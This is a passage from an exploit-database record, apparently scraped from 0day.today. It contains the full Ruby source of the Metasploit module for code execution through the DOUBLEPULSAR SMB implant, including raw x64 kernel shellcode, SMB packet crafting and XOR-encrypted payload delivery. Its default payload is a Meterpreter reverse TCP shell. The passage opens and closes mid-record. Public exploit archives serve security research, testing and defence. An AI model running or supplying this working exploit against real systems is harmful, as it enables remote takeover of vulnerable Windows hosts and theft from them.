\\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-02] #"}, "lastseen": "2021-09-01T22:14:48", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "6a7e5132f68eb285b13fba6b45c4d0cf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-02T22:14:10", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142603"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "exploitdb", "idList": ["EDB-ID:42031", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-02T22:14:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-02T22:14:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-03] #"}, "lastseen": "2021-09-02T22:14:10", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "7aba97e6be6787f367ec87402f376b36", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a 